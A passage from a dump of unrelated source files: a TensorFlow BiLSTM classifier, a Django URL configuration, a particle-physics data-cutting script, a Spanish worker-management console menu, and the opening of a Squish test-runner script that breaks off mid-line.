max([len(x) for x in self.testXList]))\n\n def loadTrainData(self, fileName):\n self.trainXList = []\n self.trainYList = []\n self.trainXQList = []\n self.seqLenList = []\n \n with open(fileName) as inFile:\n lineState = 0\n for line in inFile:\n if lineState == 0:\n wordList = re.findall(r\"[\\w<>/]+|[.,!?;]\", line.rstrip().split('\\t')[1][1:-1])\n length = len(wordList)\n self.seqLenList += [length]\n \n qList = []\n for wordInd in range(len(wordList)):\n word = wordList[wordInd]\n if word.startswith('<') and word.endswith('>'):\n wordList[wordInd] = word[4:-5]\n qList += [wordInd]\n elif word.endswith('>'):\n wordList[wordInd] = word[:-5]\n qList += [wordInd]\n elif word.startswith('<'):\n wordList[wordInd] = word[4:]\n\n self.trainXList += [np.array(wordList)]\n self.trainXQList += [qList]\n\n elif lineState == 1:\n self.trainYList += [[line.rstrip()]]\n\n lineState = (lineState + 1) % 4\n\n self.ySet = set([x[0] for x in self.trainYList])\n self.yNum = len(self.ySet)\n yList = list(self.ySet)\n self.yIndDict = {yList[ind]: ind for ind in range(self.yNum)}\n self.indToYDict = {v: k for k, v in self.yIndDict.items()}\n\n def tokenToInd(self):\n self.maxSeqLen = max([len(x) for x in self.trainXList])\n self.trainXArr = np.array([[self.wordIndDict.get(word, self.wordNum) for word in x] + [self.wordNum] * (self.maxSeqLen - len(x)) for x in self.trainXList])\n self.trainYArr = np.array([[self.yIndDict[y[0]]] for y in self.trainYList])\n self.trainXQArr = np.array(self.trainXQList)\n self.seqLenArr = np.array(self.seqLenList)\n print ('shape of trainXQArr: ', self.trainXQArr.shape)\n\n self.testXArr = np.array([[self.wordIndDict.get(word, self.wordNum) for word in x] + [self.wordNum] * (self.maxSeqLen - len(x)) for x in self.testXList])\n self.testYArr = np.array([[self.yIndDict[y[0]]] for y in self.testYList])\n self.testXQArr = np.array(self.testXQList)\n self.testSeqLenArr = np.array(self.testSeqLenList)\n\n def saveEmbedTable(self, fileName):\n with open(fileName, 'wb') as inFile:\n pickle.dump(self.embeddingArr, inFile)\n print ('embeddingArr is saved as %s' % fileName)\n\n def loadEmbedTableFile(self, fileName):\n with open(fileName, 'rb') as outFile:\n self.embeddingArr = pickle.load(outFile)\n\nclass BiDirRnnModel():\n def __init__(self):\n self.inputXPH = None\n self.inputYPH = None\n self.inputSeqLenPH = None\n self.inputXQPH = None\n self.loss = None\n\n def buildModel(self, embedDim, seqLen, yNum, wtStddev, biasStddev, embedTable, rnnHiddenDim, useRnnOutput, fcNum):\n\n with tf.name_scope('input_PH'):\n\n self.inputXPH = tf.placeholder('int32', [None, seqLen])\n self.inputYPH = tf.placeholder('int32', [None, 1])\n self.inputSeqLenPH = tf.placeholder('int32', [None])\n self.inputXQPH = tf.placeholder('int32', [None, 2])\n self.dropKeepProPH = tf.placeholder_with_default(1.0, shape = [])\n\n with tf.name_scope('embedding'):\n\n embedTable = tf.constant(embedTable, dtype = tf.float64)\n embeddedSeqPH = tf.nn.embedding_lookup(embedTable, self.inputXPH)\n qPH = tf.transpose(tf.one_hot(self.inputXQPH, seqLen, dtype = 'float64'), perm = [0, 2, 1])\n print ('qPH: ', qPH.shape)\n fullEmbeddedSeqPH = tf.concat([embeddedSeqPH, qPH], axis = 2)\n print ('fullEmbeddedSeqPH: ', fullEmbeddedSeqPH.shape)\n\n with tf.name_scope('bi-directional_rnn'):\n\n fwLstmCell = tf.nn.rnn_cell.BasicLSTMCell(rnnHiddenDim, state_is_tuple = False)\n bwLstmCell = tf.nn.rnn_cell.BasicLSTMCell(rnnHiddenDim, state_is_tuple = False)\n\n tupTup=tf.nn.bidirectional_dynamic_rnn(fwLstmCell, bwLstmCell, fullEmbeddedSeqPH, self.inputSeqLenPH, dtype='float64')\n (fwOutput, bwOutput), (fwState, bwState) = tupTup\n biOutput = tf.concat([fwOutput, bwOutput], axis = 2)\n biState = tf.concat([fwState, bwState], axis = 1)\n #print ('shape of fwState, bwState: ', fwState.get_shape(), bwState.get_shape())\n print ('shape of biOutput: ', biOutput.get_shape())\n print ('shape of biState: ', biState.get_shape())\n\n if useRnnOutput:\n\n batchSize = tf.shape(self.inputXPH)[0]\n rangePH = tf.range(batchSize, dtype = 'int32')\n indicesPHPre = tf.tile(tf.expand_dims(tf.expand_dims(rangePH, axis = 1), axis = 2), multiples = [1, 2, 1])\n indicesPH = tf.concat([indicesPHPre, tf.expand_dims(self.inputXQPH, axis = 2)], axis = 2)\n qBiOutput = tf.gather_nd(biOutput, indicesPH)\n \n qSh = qBiOutput.get_shape()\n fcInPH = tf.concat([biState, tf.reshape(qBiOutput, [-1, qSh[1] * qSh[2]])], axis = 1)\n\n else:\n fcInPH = biState\n\n with tf.name_scope('fully_connected_layer'):\n\n inNodeNum = 8 * rnnHiddenDim if useRnnOutput else 4 * rnnHiddenDim\n nodeNumList = self.getNodeNumList(inNodeNum, yNum, fcNum)\n \n for layerInd in range(fcNum):\n fcInPH = tf.nn.dropout(fcInPH, keep_prob = tf.cast(self.dropKeepProPH, 'float64')) if layerInd != 0 else fcInPH\n fcInPH = self.fcLayer(fcInPH, nodeNumList[layerInd], wtStddev, biasStddev)\n if layerInd != fcNum-1:\n fcInPH = tf.nn.relu(fcInPH)\n outputPH = fcInPH\n\n self.predY = tf.argmax(outputPH, axis = 1)\n lossPre = tf.nn.softmax_cross_entropy_with_logits(labels = tf.one_hot(self.inputYPH, yNum), logits = outputPH)\n self.loss = tf.reduce_sum(lossPre)\n\n def trainModel(self, epochNum, learningRate, trainXArr, trainYArr, trainXQArr, seqLenArr, testXArr, testYArr, testXQArr, testSeqLenArr, indToYDict, outputFileName, batchSize, dropKeepPro):\n\n print ('fileName: ', outputFileName)\n\n optimizer = tf.train.AdamOptimizer(learning_rate = learningRate).minimize(self.loss)\n feedDict = {self.inputXPH: trainXArr, self.inputYPH: trainYArr, self.inputXQPH: trainXQArr, self.inputSeqLenPH: seqLenArr}\n testFeedDict = {self.inputXPH:testXArr,self.inputYPH:testYArr,self.inputXQPH:testXQArr,self.inputSeqLenPH:testSeqLenArr}\n batchNum = len(trainXArr) // batchSize\n\n with tf.Session(config = config) as sess:\n sess.run(tf.global_variables_initializer())\n for epochInd in range(epochNum):\n print ('training epoch %d...' % epochInd)\n feedDict = self.shuffleDict(feedDict)\n\n for batchInd in range(batchNum):\n batchFeedDict = self.getBatch(feedDict, batchSize, batchInd * batchSize)\n batchFeedDict[self.dropKeepProPH] = dropKeepPro\n sess.run(optimizer, feed_dict = batchFeedDict)\n \n print ('loss: ', sess.run(self.loss, feed_dict = feedDict))\n print ('training accuracy: ', self.getAcc(sess, feedDict))\n print ('testing accuracy: ', self.getAcc(sess, testFeedDict))\n\n self.outputAns(sess, outputFileName, indToYDict, testFeedDict, 8001)\n\n def outputAns(self, sess, fileName, indToYDict, feedDict, startNum):\n predY = sess.run(self.predY, feed_dict = feedDict)\n with open(fileName, 'w') as outFile:\n for ind in range(len(predY)):\n outFile.write(str(startNum + ind) + '\\t' + indToYDict[predY[ind]] + '\\n')\n print ('output saved as ', fileName)\n\n def getAcc(self, sess, feedDict):\n predY = sess.run(self.predY, feed_dict = feedDict)\n return np.mean(np.equal(predY, np.squeeze(feedDict[self.inputYPH])))\n\n def shuffleDict(self, inDict):\n aKey = list(inDict.keys())[0]\n permutation = np.random.permutation(len(inDict[aKey]))\n return {k: v[permutation] for k, v in inDict.items()}\n\n def getBatch(self, inDict, batchSize, startInd):\n return {k: v[startInd: startInd + batchSize] for k, v in inDict.items()}\n\n def fcLayer(self, inPH, outDim, wtStddev, biasStddev):\n inDim = tf.cast(inPH.shape[1], tf.int32)\n wt = tf.Variable(tf.random_normal([inDim, outDim], stddev = wtStddev, dtype = 'float64'), dtype = 'float64')\n bias = tf.Variable(tf.random_normal([outDim], stddev = biasStddev, dtype = 'float64'), dtype = 'float64')\n \n return tf.matmul(inPH, wt) + bias\n\n def getNodeNumList(self, inDim, outDim, layerNum):\n upList = [inDim]\n downList = [outDim]\n for layerInd in range(layerNum-1):\n if upList[-1] * 1.5 < downList[-1] * 2:\n upList += [upList[-1] * 1.5]\n else:\n downList += [downList[-1] * 2]\n return upList[1:] + downList[::-1]\n\nif __name__ == '__main__':\n df = DataFormater()\n df.loadEmbedTableFile('embedTable.pkl')\n df.loadEmbedTable('glove/glove.6B.50d.txt')\n df.loadTrainData('TRAIN_FILE.txt')\n df.loadTestData('TEST_FILE.txt', 'answer_key.txt')\n df.tokenToInd()\n #df.saveEmbedTable('embedTable.pkl')\n\n bdmd = BiDirRnnModel()\n bdmd.buildModel(embedDim = df.embedDim, seqLen = df.maxSeqLen, yNum = df.yNum, wtStddev = 0.1, biasStddev = 0.01, embedTable = df.embeddingArr, rnnHiddenDim = 8, useRnnOutput = True, fcNum = 1)\n bdmd.trainModel(epochNum = 100, learningRate = 0.001, trainXArr = df.trainXArr, trainYArr = df.trainYArr, trainXQArr = df.trainXQArr, seqLenArr = df.seqLenArr, testXArr = df.testXArr, testYArr = df.testYArr, testXQArr = df.testXQArr, testSeqLenArr = df.testSeqLenArr, indToYDict = df.indToYDict, outputFileName = 'answer_hid8_useOutput_fc1_drop1.0.txt', batchSize = 128, dropKeepPro = 1.0)\n","sub_path":"bi-directional_LSTM_position_labeled/bi-directional_LSTM_model.py","file_name":"bi-directional_LSTM_model.py","file_ext":"py","file_size_in_byte":13356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"297912424","text":"from django.conf.urls import patterns, include, url\nfrom testex.views import *\nfrom testex.search1 import *\nfrom testex.visual import *\nfrom django.contrib import admin\nfrom testex import *\nadmin.autodiscover()\n\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'testex.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^hello/$', \"testex.views.hello\"), \n url(r'^hello1/$', \"testex.views.current_datetime1\"),\n url(r'^time/plus/(\\d{1,2})/$', hours_ahead),\t\n url(r'^$', \"testex.views.temp\"),\n url(r'^x/$', \"testex.views.search_form\"),\n url(r'^search/', \"testex.views.search\"),\n url(r'^search_data/', \"testex.search1.search_d\"), \n url(r'^search_new/', \"testex.search1.search_new\"), \t\n url(r'^page1/', \"testex.visual.page1\"),\n url(r'stdenrolled', \"testex.visual.stdenrolled\"),\n url(r'^visualization/', \"testex.visual.visual\"), \n url(r'^visualization/page1', \"testex.visual.page1\"),\n url(r'^visual/check', \"testex.visual.check\"), \n url(r'^v1', \"testex.visual.v1\"), \n url(r'^ch', \"testex.automater.ch\"), \n url(r'^loading/', \"testex.visual.load\"),\n url(r'^submit1/', \"testex.visual.submit1\"), \n url(r'^js1/', \"testex.visual.js1\"),\n url(r'^js2/', \"testex.visual.js2\"),\n url(r'^js3/', \"testex.visual.js3\"),\n url(r'^js4/', \"testex.visual.js4\"),\n url(r'^js5/', \"testex.visual.js5\"),\n url(r'^js6/', \"testex.visual.js6\"),\n url(r'^js7/', \"testex.visual.js7\"),\n url(r'^js8/', \"testex.visual.js8\"),\n url(r'^js9/', \"testex.visual.js9\"),\n url(r'^js10/', \"testex.visual.js10\"),\n url(r'^js11/', \"testex.visual.js11\"),\n #url(r'^print_status', \"testex.visual.print_status\"), \n #url(r'^automater/', \"testex.automater.main\"), \n url(r'visual/graphs/', \"testex.visual.graphs\"), \n url(r'visual/task_in_progress/', \"testex.visual.task_in_progress\"),\n url(r'^django-rq/', include('django_rq.urls')), \t\n url(r'visual/load/', \"testex.automater.load\"),\n url(r'^automater/r/', \"testex.automater.r\"),\n url(r'print_status/', \"testex.automater.print_status\"), \n url(r'^success/','testex.t.success'),\n url(r'^say_hello/','testex.t.say_hello'),\n# url(r'^rp/','testex.rp.rp'),\n\n)\n","sub_path":"django/testex/testex/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"550567185","text":"#Cuts data loosely to prepare for NN.\n\nimport numpy as np\nimport sys \nimport uproot\nimport pandas as pd\nimport LorentzVector as LV\n\n\n#Run over one set at a time, either W,Z, 700, or 800 \nif (sys.argv[1] != 'W' and sys.argv[1] != 'Z' and sys.argv[1] != 'Signal700' and sys.argv[1] != 'Signal800'):\n raise Exception('Bad argument')\nif (sys.argv[1] == 'Signal700'):\n imported = uproot.open('Signal.root')['SS_700_695_NoSys']\nelif (sys.argv[1] == 'Signal800'):\n imported = uproot.open('Signal.root')['SS_800_795_NoSys']\nelse:\n imported = uproot.open(sys.argv[1]+'jets_split/'+sys.argv[1] + 'jets_' + sys.argv[2]+'.root')['nominal']\n \n#Put all variables we want to use here\nUsedData = imported.arrays(['jet_n','jet_pt','el_n','mu_n','met','met_phi', 'baselineLep_n','jet_eta','jet_phi','jet_m','event_weight'])\n\n\n#Function to take care of different size arrays in array (pTs). All will be same length (based on event with most jets), with zeros in end if space left over\ndef JaggedFixer(array, array_n):\n new_array = np.zeros([array.size, array_n.max()])\n for i in range(len(array)):\n if (array[i].size!=0):\n new_array[i][:array[i].size] = array[i]\n return new_array\n\n#Change this function based on what data we are using\ndef preprocess(DataDict):\n \n processed = {}\n processed['met_phi'] = DataDict[b'met_phi']\n \n processed['jet_n'] = DataDict[b'jet_n']\n tempPT = JaggedFixer(DataDict[b'jet_pt'],DataDict[b'jet_n'])\n processed['jet1_pt'] = tempPT[:,0] #momenta of 1st jet, 0 if no jets\n processed['jet2_pt'] = tempPT[:,1] #momenta of 2nd jet, 0 if no 2nd jet\n processed['jet3_pt'] = tempPT[:,2] #same\n \n tempEta = JaggedFixer(DataDict[b'jet_eta'],DataDict[b'jet_n'])\n processed['jet1_eta'] = tempEta[:,0] #eta of 1st jet, 0 if no jets\n processed['jet2_eta'] = tempEta[:,1]\n \n tempPhi = JaggedFixer(DataDict[b'jet_phi'],DataDict[b'jet_n'])\n processed['jet1_phi'] = tempPhi[:,0] #phi of 1st jet, 0 if no jets\n processed['jet2_phi'] = tempPhi[:,1]\n \n tempM = JaggedFixer(DataDict[b'jet_m'],DataDict[b'jet_n'])\n processed['jet1_m'] = tempM[:,0] #mass of 1st jet, 0 if no jets\n processed['jet2_m'] = tempM[:,1]\n \n processed['HT'] = DataDict[b'jet_pt'].sum() #Scalar sum of jet_pt's, known has HT\n processed['met'] = DataDict[b'met']\n processed[\"Is_Signal\"] = ((DataDict[b'jet_n']>=0) & ((sys.argv[1] == 'Signal700') or (sys.argv[1] == 'Signal800'))).astype('float') #0 if BG, 1 if signal\n processed['event_weight'] = DataDict[b'event_weight']\n \n return processed\n\n#Variables we're actually dealing with after prep\nVariables = ['jet_n','HT','jet1_pt','jet2_pt','jet3_pt','met','met_phi','jet1_eta','jet2_eta','jet1_phi','jet2_phi','jet1_m','jet2_m','Is_Signal','event_weight'] \nProcessedData = preprocess(UsedData)\n#At this point, have a dict with all data-variables as keys and good arrays as values.\n\n#Choose cuts we want to enforce, create array of indices of events that fall outside of cut \nremovedIndeces = []\nfor i in range(len(UsedData[b'mu_n'])):\n if (UsedData[b'mu_n'][i] != 0 or UsedData[b'el_n'][i] != 0 or UsedData[b'baselineLep_n'][i]!=0 or ProcessedData['jet_n'][i]<1 or ProcessedData['met'][i]<110): #or ProcessedData['jet1_pt'][i]>1450 or ProcessedData['jet2_pt'][i]>600):\n \tremovedIndeces.append(i)\n\ndef CutData(ProcessedData, removedIndeces, Variables):\n \n CutData = {}\n for i in Variables:\n \tCutData[i] = np.delete(ProcessedData[i],removedIndeces,None)\n return CutData\n\nCutDataDict = CutData(ProcessedData, removedIndeces, Variables)\n#Now we have a dictionary with the non-wanted data cut out. But still want HT_sig and other dependencies (that could be zero b4)\n#This function adds HT_sig etc. which will now all be non-zero/non-infinite\n\ndef DPhi(met, met_phi, jet_pt,jet_eta,jet_phi,jet_m):\n Dphi = np.zeros([met.size])\n MET_TLV = LV.LorentzVector()\n Jet_TLV = LV.LorentzVector()\n for i in range(met.size):\n MET_TLV.SetXYZT(met[i]*np.cos(met_phi[i]),met[i]*np.sin(met_phi[i]),0,0)\n Jet_TLV.SetPtEtaPhiM(jet_pt[i],jet_eta[i],jet_phi[i],jet_m[i])\n DeltaPhi = abs(MET_TLV.DeltaPhi(Jet_TLV))\n Dphi[i] = DeltaPhi\n \n return Dphi\n\n#Do the same thing as before, new dictionary with some new variables added\ndef postprocess(DataDict):\n processed = {}\n processed['met_phi'] = DataDict['met_phi']\n #processed['baselineLep_n'] = DataDict[b'baselineLep_n']\n \n processed['jet_n'] = DataDict['jet_n']\n \n processed['jet1_pt'] = DataDict['jet1_pt'] #momenta of 1st jet, 0 if no jets\n processed['jet2_pt'] = DataDict['jet2_pt'] #momenta of 2nd jet, 0 if no 2nd jet\n processed['jet3_pt'] = DataDict['jet3_pt'] #same\n \n processed['HT'] = DataDict['HT']\n processed['Meff'] = DataDict['met']+DataDict['HT']\n processed['HT_Sig'] = (DataDict['met']/np.sqrt(DataDict['HT'])) #HT_sig = MET/(HT)^(1/2) \n #processed['jet_pt'] = JaggedFixer(DataDict[b'jet_pt'],DataDict[b'jet_n'])\n \n processed['DPhi1'] = DPhi(DataDict['met'],DataDict['met_phi'],DataDict['jet1_pt'],DataDict['jet1_eta'],DataDict['jet1_phi'],DataDict['jet1_m'])\n processed['DPhi2'] = DPhi(DataDict['met'],DataDict['met_phi'],DataDict['jet2_pt'],DataDict['jet2_eta'],DataDict['jet2_phi'],DataDict['jet2_m'])\n \n processed['met'] = DataDict['met']\n processed['Is_Signal'] = DataDict['Is_Signal']\n processed['event_weight'] = DataDict['event_weight']\n \n \n \n return processed\n\n#Variables we now have\nPostVariables = ['jet_n','jet1_pt','jet2_pt','jet3_pt','met','met_phi','HT','HT_Sig','Meff','DPhi1','DPhi2','Is_Signal','event_weight']\n\nPostData = postprocess(CutDataDict)\n\n#If additional cuts need to be made on variables that couldn't be introduced until now (HT_Sig, Meff, Dphi's), do that here\nPostremovedIndeces = []\nfor i in range(len(PostData['met'])):\n if (PostData['HT_Sig'][i]<6 or PostData['Meff'][i]<300):\n \tPostremovedIndeces.append(i)\n \t\nFinalData = CutData(PostData,PostremovedIndeces, PostVariables)\n\n#print(\"Number of events:\", len(FinalData['met']))\n\n#Save to DF\nDataFrame = pd.DataFrame.from_dict(FinalData)\nif (len(sys.argv)>2):\n DataFrame.to_pickle(sys.argv[1]+sys.argv[2]+'DF.pkl')\nelse:\n DataFrame.to_pickle(sys.argv[1]+'DF.pkl')\n\n","sub_path":"NN/CutData.py","file_name":"CutData.py","file_ext":"py","file_size_in_byte":6282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"217692723","text":"import Funciones\nfrom Contrato import Contrato\nfrom Responsable import Responsable\nfrom Trabajador import Trabajador\n\ntalleres = {}\ncontTalleres = 0\ntrabajadores = {}\ncontTrabajadores = 0\ncontratos = {}\ncontContratos = 0\n\ncontinuar = True\n\nkeyMax = 0\nfor key, trabajador in Funciones.cargarTrabajadores().items():\n trabajadores[key] = trabajador\n if int(key) > int(keyMax):\n keyMax = key\nif len(trabajadores) > 0:\n contTrabajadores = int(keyMax)+1\n\nkeyMax = 0\nfor key, taller in Funciones.cargarTalleres().items():\n talleres[key] = taller\n if int(key) > int(keyMax):\n keyMax = key\nif len(talleres) > 0:\n contTalleres = int(keyMax)+1\n\nkeyMax = 0\nfor key, contrato in Funciones.cargarContratos().items():\n contratos[key] = contrato\n if int(key) > int(keyMax):\n keyMax = key\nif len(contratos) > 0:\n contContratos = int(keyMax)+1\n\n\ntry:\n while continuar:\n print(\"############################################\")\n print(\"# MENÚ #\")\n print(\"############################################\")\n print(\"# #\")\n print(\"# 1. Dar de alta a un trabajador #\")\n print(\"# 2. Mostrar trabajadores y responsables #\")\n print(\"# 3. Reasignar a un trabajador #\")\n print(\"# 4. Dar de baja a un trabajador #\")\n print(\"# #\")\n print(\"# 5. Asignar responsable #\")\n print(\"# #\")\n print(\"# 6. Mostrar talleres #\")\n print(\"# #\")\n print(\"# 7. Generar informes #\")\n print(\"# #\")\n print(\"# 10. Salir (y guardar) #\")\n print(\"# #\")\n print(\"############################################\")\n\n print()\n menu = input(\"Opción elegida: \")\n print()\n\n if menu == \"1\":\n tipo = input(\"¿Es un nuevo trabajador o uno inactivo? (0 = Inactivo | 1 = Nuevo)\")\n if tipo == \"0\":\n idInactivo = input(\"ID del trabajador inactivo: \")\n if not Funciones.existeId(trabajadores, idInactivo):\n print(\"No existe ningún trabajador con esa ID.\")\n elif trabajadores[int(idInactivo)].activo:\n print(\"Ese trabajador está activo actualmente\")\n else:\n contLoc = 0\n contTaller = 0\n valido = False\n while not valido:\n if contLoc == 0:\n localidadPref = input(\"Preferencia de localidad del trabajador: \")\n for key, taller in talleres.items():\n if taller.localidad == localidadPref:\n contLoc += 1\n if taller.vacantes > 0:\n contTaller += 1\n tallerTrab = key\n valido = True\n continue\n if contLoc == 0:\n print(\"No existen talleres con esa localidad.\")\n elif contTaller == 0:\n print(\"No se han encontrado vacantes en esa localidad\")\n tallerTrab = input(\"Escoja un taller: \")\n if not tallerTrab.isdigit():\n print(\"Debe introducir un número.\")\n else:\n for key, taller in talleres.items():\n contTaller += 1\n if key == int(tallerTrab):\n valido = True\n continue\n if contTaller == 0:\n print(\"La ID no existe, introduzca una ID válida.\")\n trabajadores[int(idInactivo)].activo = True\n trabajadores[int(idInactivo)].taller = tallerTrab\n talleres[int(tallerTrab)].vacantes -= 1\n\n contratos[contContratos] = Contrato(int(idInactivo), int(tallerTrab))\n contContratos += 1\n print(\"Trabajador reactivado y asignado correctamente\")\n elif tipo == \"1\":\n trabajadores[contTrabajadores] = Funciones.crearTrabajador(talleres, trabajadores)\n contratos[contContratos] = Contrato(contTrabajadores, trabajadores[contTrabajadores].taller)\n contContratos += 1\n contTrabajadores += 1\n else:\n print(\"Error, opción inválida\")\n elif menu == \"2\":\n Funciones.mostrarDiccionarioSimple(trabajadores)\n mas = input(\"¿Desea ver la información detallada de algún trabajador? (Sí = ID del Trabajador | No = -1)\")\n if not mas.isdigit() and not mas == \"-1\":\n print(\"Introduce un número válido.\")\n else:\n if not mas == \"-1\":\n if not Funciones.existeId(trabajadores, mas):\n print(\"No existe ningún trabajador con esa ID.\")\n else:\n print(str(trabajadores[int(mas)]))\n print()\n print(\"Talleres en los que ha trabajado el Trabajador: \")\n Funciones.mostrarContratosTrabajador(contratos, talleres, int(mas))\n elif menu == \"3\":\n idInactivo = input(\"ID del trabajador: \")\n if not Funciones.existeId(trabajadores, idInactivo):\n print(\"No existe ningún trabajador con esa ID.\")\n else:\n contLoc = 0\n contTaller = 0\n valido = False\n while not valido:\n if contLoc == 0:\n localidadPref = input(\"Preferencia de localidad del trabajador: \")\n for key, taller in talleres.items():\n if taller.localidad == localidadPref:\n contLoc += 1\n if taller.vacantes > 0:\n contTaller += 1\n tallerTrab = key\n valido = True\n continue\n if contLoc == 0:\n print(\"No existen talleres con esa localidad.\")\n elif contTaller == 0:\n print(\"No se han encontrado vacantes en esa localidad\")\n tallerTrab = input(\"Escoja un taller: \")\n if not tallerTrab.isdigit():\n print(\"Debe introducir un número.\")\n else:\n for key, taller in talleres.items():\n contTaller += 1\n if key == int(tallerTrab):\n valido = True\n continue\n if contTaller == 0:\n print(\"La ID no existe, introduzca una ID válida.\")\n if trabajadores[int(idInactivo)] is Trabajador:\n talleres[int(tallerTrab)].vacantes += 1\n\n trabajadores[int(idInactivo)].activo = True\n trabajadores[int(idInactivo)].taller = tallerTrab\n\n if trabajadores[int(idInactivo)] is Trabajador:\n talleres[int(tallerTrab)].vacantes -= 1\n\n contratos[contContratos] = Contrato(int(idInactivo), int(tallerTrab))\n contContratos += 1\n print(\"Trabajador reasignado\")\n elif menu == \"4\":\n idTrabajadorBaja = input(\"ID del trabajador: \")\n if not Funciones.existeId(trabajadores, idTrabajadorBaja):\n print(\"No existe ningún trabajador con esa ID.\")\n elif not trabajadores[int(idTrabajadorBaja)].activo:\n print(\"Ese trabajador está inactivo actualmente\")\n else:\n trabajadores[int(idTrabajadorBaja)].activo = False\n print(\"Trabajador dado de baja correctamente.\")\n elif menu == \"5\":\n idTrabajador = input(\"ID del trabajador: \")\n if not Funciones.existeId(trabajadores, idTrabajador):\n print(\"No existe ningún trabajador con esa ID.\")\n elif trabajadores[int(idTrabajador)] is Responsable:\n print(\"El trabajador ya es responsable de un taller. Antes de asignarlo a otro taller, deberá asignar un nuevo Responsable.\")\n else:\n valido = False\n while not valido:\n telefonoContacto = input(\"Teléfono: \")\n if not telefonoContacto.isdigit():\n print(\"Introduzca solo números.\")\n elif not len(telefonoContacto) == 9:\n print(\"El número debe tener un longitud de 9.\")\n else:\n valido = True\n valido = False\n while not valido:\n nSegSoc = input(\"Número de la Seguridad Social: \")\n if not nSegSoc:\n valido = True\n elif not nSegSoc.isdigit():\n print(\"Introduzca solo números.\")\n elif not len(nSegSoc) == 9:\n print(\"El número debe tener un longitud de 9.\")\n else:\n valido = True\n trabajadores[int(idTrabajador)] = Responsable(trabajadores[int(idTrabajador)].nombre, trabajadores[int(idTrabajador)].apellidos, trabajadores[int(idTrabajador)].dni, trabajadores[int(idTrabajador)].activo, nSegSoc, trabajadores[int(idTrabajador)].taller, telefonoContacto, trabajadores[int(idTrabajador)].email, trabajadores[int(idTrabajador)].preferencia)\n elif menu == \"6\":\n Funciones.mostrarDiccionarioSimple(talleres)\n mas = input(\"¿Desea ver la información detallada de algún taller? (Sí = ID del Taller | No = -1)\")\n if not mas.isdigit() and not mas == \"-1\":\n print(\"Introduce un número válido.\")\n else:\n if not mas == \"-1\":\n if not Funciones.existeId(talleres, mas):\n print(\"No existe ningún taller con esa ID.\")\n else:\n print(str(talleres[int(mas)]))\n elif menu == \"7\":\n opcionInforme = input(\"\\t0. Informe de Trabajador\\n\\t1. Informe de Taller\\n\\nOpción elegida: \")\n if opcionInforme == \"0\":\n idTrabajador = input(\"ID del trabajador: \")\n if not Funciones.existeId(trabajadores, idTrabajador):\n print(\"No existe ningún trabajador con esa ID.\")\n else:\n informe = Funciones.generarInformeTrabajador(idTrabajador, trabajadores[int(idTrabajador)], talleres, contratos)\n print(informe)\n else:\n idTaller = input(\"ID del taller: \")\n if not Funciones.existeId(talleres, idTaller):\n print(\"No existe ningún taller con esa ID.\")\n else:\n informe = Funciones.generarInformeTaller(idTaller, talleres[int(idTaller)], trabajadores, contratos)\n print(informe)\n\n opcionGuardar = input(\"¿Desea guardar el informe?\\n\\t0. No\\n\\t1. Sí\\n\\nOpción elegida: \")\n if opcionGuardar == \"1\":\n valido = False\n while not valido:\n nombreFichero = input(\"Nombre del fichero: \")\n if not nombreFichero:\n print(\"Debes introducir un nombre.\")\n else:\n Funciones.guardarInforme(nombreFichero, informe)\n valido = True\n elif menu == \"10\":\n Funciones.guardarTodo(talleres, trabajadores)\n continuar = False\n\n print()\n\n Funciones.guardarTodo(talleres, trabajadores)\nexcept:\n print(\"Ha ocurrido un error inesperado, pero no te preocupes, tus datos se han guardado.\")\nfinally:\n Funciones.guardarTodo(talleres, trabajadores)","sub_path":"EX01-Examen01/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":12746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"315349934","text":"import os\r\nimport re\r\nimport sys\r\nimport stat\r\nimport shlex\r\nimport getpass\r\nimport optparse\r\nimport shutil\r\n\r\nfrom xlib import xTools\r\n\r\n__author__ = 'syan'\r\n\r\nRUN_SQUISH = \"\"\"#!/bin/sh\r\n%(run_server)s\r\n%(sleep)s\r\n%(squishserver)s --config addAUT %(name_of_aut)s \"%(path_to_aut)s\"\r\n%(squishrunner)s --testsuite \"%(testsuite)s\" %(testcase)s --reportgen xml2.1,\"%(reportgen)s\" --cwd %(cwd)s --aut %(name_of_aut)s\r\n%(squishserver)s --stop\r\n\"\"\"\r\n\r\ndef kill_cmd(pid, on_win=True):\r\n if on_win:\r\n import win32con, win32api\r\n handle = win32api.OpenProcess(win32con.PROCESS_TERMINATE, 0, pid)\r\n win32api.TerminateProcess(handle, 0)\r\n win32api.CloseHandle(handle)\r\n else:\r\n kill_cmd_str = \"kill -9 %d\" % pid\r\n sts, text = xTools.get_status_output(kill_cmd_str)\r\n if sts:\r\n return 1\r\n\r\nclass RunSquish:\r\n def __init__(self):\r\n _xlib = os.path.join(xTools.get_file_dir(sys.argv[0]), \"xlib\")\r\n self.xlib = os.path.abspath(_xlib)\r\n self.user = getpass.getuser()\r\n # //////////////////////////\r\n # // Frank Chen need more check for the following suites\r\n # //\r\n self.prc_check_suites = (\"suite_BE_21_PIO_DRC\", \"suite_BE_01_SSO\")\r\n\r\n def process(self):\r\n self.run_option_parser()\r\n self.on_win, self.nt_lin = xTools.get_os_name(self.x86)\r\n if self.kill_all_squish_processes():\r\n return 1\r\n if self.kill_all:\r\n return\r\n if self.sanity_check():\r\n return 1\r\n\r\n if self.run_it():\r\n return 1\r\n\r\n self.behavior_check()\r\n\r\n def behavior_check(self):\r\n suite_name = os.path.basename(os.path.dirname(self.suite))\r\n if suite_name not in self.prc_check_suites:\r\n return\r\n case_log_dir = os.path.dirname(self.suite)\r\n # mush have \"case\" and \"log\" directory\r\n _dir_list = os.listdir(case_log_dir)\r\n if \"case\" not in _dir_list:\r\n return -1\r\n if \"log\" not in _dir_list:\r\n return -2\r\n cur_dir = os.getcwd()\r\n os.chdir(case_log_dir)\r\n if suite_name == \"suite_BE_01_SSO\":\r\n cmd_lines_a = [r'cp ./case/*.ini ./log/',\r\n r'cp ./case/scan_result.bat ./log/',]\r\n cmd_lines_b = [r'svn export http://d50534/auto/bqs_scripts/trunk --username=public --password=lattice --force',\r\n r'call 